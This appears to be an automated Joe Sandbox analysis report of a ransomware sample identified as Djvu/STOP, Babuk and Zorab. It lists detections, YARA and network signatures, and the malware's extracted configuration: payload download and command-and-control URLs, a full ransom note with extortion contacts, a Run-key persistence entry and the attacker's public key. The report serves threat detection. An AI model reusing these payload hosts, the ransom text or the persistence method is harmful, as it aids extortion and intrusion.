Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe

Overview

General Information

Sample name:DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
Analysis ID:1482678
MD5:3a11d47ad1a6093ddfe84e48e77554f3
SHA1:bdbce8ed4a6b1347b0f1ad23184709e82ccd0249
SHA256:e565c0b80462bd207d991cb9d9fd34c9d72b45e4696797f9d59f0e153b3a54a9
Tags:exeStop
Infos:

Detection

Babuk, Bdaejec, Djvu, Zorab
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Babuk Ransomware
Yara detected Bdaejec
Yara detected Djvu Ransomware
Yara detected Zorab Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
PE file contains section with special chars
Uses known network protocols on non-standard ports
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://zerit.top/dl/build2.exe", "http://fuyt.org/files/1/build3.exe"], "C2 url": "http://fuyt.org/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-0S984cQ4B3\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@sysmail.ch\r\n\r\nReserve e-mail address to contact us:\r\nsupportsys@airmail.cc\r\n\r\nYour personal ID:\r\n0430JIjdm", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAup7xLNZcQ4MZOSDTvBj6\\\\n7Shvgof4dZwAEFfM4Qn6EvfybMldng8cq4I8XKCGgbb4qleJAF7W2dmJHdLsc5du\\\\nn8FhrNPyozIM2b3b+aIVTP\\/lJE4DFAuzoGoNy\\/r7ZMMCouk+kV+0YBL\\/H9AD2HSx\\\\ntpYMoPkxkjt02aJScPkgYcIZKsj8LUimPmEy34gW\\/wIkqvbMYKXtNnao\\/qED9CFR\\\\n6UBM46bPFhHq3QpKPr6sdTg4kaQi\\/ZLueJvFVZ2raXOcEA1TunnUmTVfBP6Uboip\\\\nfrCky0fkvCyEHfX6+Sizo50\\/glCm7dKNyNlXe3DaKCDvma36A+5uUwe+8X2hPKdj\\\\nJQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000002.1495269240.0000000002121000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000018.00000002.1411881019.00000000021C0000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      Click to see the 60 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
        • 0xfe888:$x1: C:\SystemID\PersonalID.txt
        • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
        • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
        • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
        • 0xfecec:$s1: " --AutoStart
        • 0xfed00:$s1: " --AutoStart
        • 0x102948:$s2: --ForNetRes
        • 0x102910:$s3: --Admin
        • 0x102d90:$s4: %username%
        • 0x102eb4:$s5: ?pid=
        • 0x102ec0:$s6: &first=true
        • 0x102ed8:$s6: &first=false
        • 0xfedf4:$s7: delself.bat
        • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
        • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
        12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          Click to see the 67 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, ProcessId: 3712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
          Sigma detected: Use Short Name Path in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\HhVfIB.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\HhVfIB.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\HhVfIB.exe, ParentCommandLine: "C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe", ParentImage: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, ParentProcessId: 3956, ParentProcessName: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, ProcessId: 5968, ProcessName: HhVfIB.exe

          Snort Signatures

          No Snort rule has matched

          Suricata Signatures

          Timestamp:2024-07-26T02:08:16.940420+0200
          SID:2838522
          Source Port:63964
          Destination Port:53
          Protocol:UDP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:09:13.452169+0200
          SID:2833438
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:08:40.407516+0200
          SID:2803274
          Source Port:49725
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:08:20.342806+0200
          SID:2807908
          Source Port:49703
          Destination Port:799
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:08:34.362546+0200
          SID:2022930
          Source Port:443
          Destination Port:49717
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T02:10:03.175249+0200
          SID:2803274
          Source Port:49736
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:08:32.511346+0200
          SID:2803274
          Source Port:49715
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:09:12.056798+0200
          SID:2022930
          Source Port:443
          Destination Port:49732
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T02:09:36.695274+0200
          SID:2803274
          Source Port:49734
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:08:40.821957+0200
          SID:2803274
          Source Port:49726
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:10:06.347356+0200
          SID:2833438
          Source Port:49737
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:09:39.873831+0200
          SID:2833438
          Source Port:49735
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:08:47.048697+0200
          SID:2833438
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:08:43.842682+0200
          SID:2036333
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T02:08:43.883544+0200
          SID:2036334
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T02:08:22.237053+0200
          SID:2803274
          Source Port:49704
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:08:17.933192+0200
          SID:2838522
          Source Port:63964
          Destination Port:53
          Protocol:UDP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:08:15.901932+0200
          SID:2838522
          Source Port:63964
          Destination Port:53
          Protocol:UDP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-07-26T02:08:25.591095+0200
          SID:2803274
          Source Port:49709
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:08:18.857235+0200
          SID:2803274
          Source Port:49702
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-07-26T02:09:05.270645+0200
          SID:2036333
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-26T02:09:10.250094+0200
          SID:2036334
          Source Port:49730
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarsAvira URL Cloud: Label: phishing
          Source: http://zerit.top/dl/build2.exeAvira URL Cloud: Label: phishing
          Source: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=trueAvira URL Cloud: Label: malware
          Source: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200Avira URL Cloud: Label: malware
          Source: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200vAvira URL Cloud: Label: malware
          Source: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200xAvira URL Cloud: Label: malware
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarHAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarPUAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarpAvira URL Cloud: Label: phishing
          Source: http://ddos.dnsnb8.net:799/cj//k1.rarfAvira URL Cloud: Label: phishing
          Source: http://fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF2005Avira URL Cloud: Label: malware
          Source: http://fuyt.org/test1/get.phpAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\tmpAAA2.tmpAvira: detection malicious, Label: W32/Jadtre.D
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
          Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
          Found malware configuration
          Source: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://zerit.top/dl/build2.exe", "http://fuyt.org/files/1/build3.exe"], "C2 url": "http://fuyt.org/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-0S984cQ4B3\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@sysmail.ch\r\n\r\nReserve e-mail address to contact us:\r\nsupportsys@airmail.cc\r\n\r\nYour personal ID:\r\n0430JIjdm", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeReversingLabs: Detection: 95%
          Multi AV Scanner detection for submitted file
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeReversingLabs: Detection: 95%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
          Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040E870
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040EA51 CryptDestroyHash,CryptReleaseContext,6_2_0040EA51
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,6_2_0040EAA0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040EC68 CryptDestroyHash,CryptReleaseContext,6_2_0040EC68
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,6_2_00410FC0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00411178 CryptDestroyHash,CryptReleaseContext,6_2_00411178
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAup7xLNZcQ4MZOSDTvBj6\\n7Shvgof4dZwAEFfM4Qn6EvfybMldng8cq4I8XKCGgbb4qleJAF7W2dmJHdLsc5du\\nn8FhrNPyozIM2b3b+aIVTP\/lJE4DFAuzoGoNy\/r7ZMMCouk+kV+0YBL\/H9AD2HSx\\ntpYMoPkxkjt02aJScPkgYcIZKsj8LUimPmEy34gW\/wIkqvbMYKXtNnao\/qED9CFR\\n6UBM46bPFhHq3QpKPr6sdTg4kaQi\/ZLueJvFVZ2raXOcEA1TunnUmTVfBP6Uboip\\nfrCky0fkvCyEHfX6+Sizo50\/glCm7dKNyNlXe3DaKCDvma36A+5uUwe+8X2hPKdj\\nJQIDAQAB\\n-----END PUBLIC KEY-----memstr_aa874e80-4

          Compliance

          barindex
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeUnpacked PE file: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\_readme.txtJump to behavior
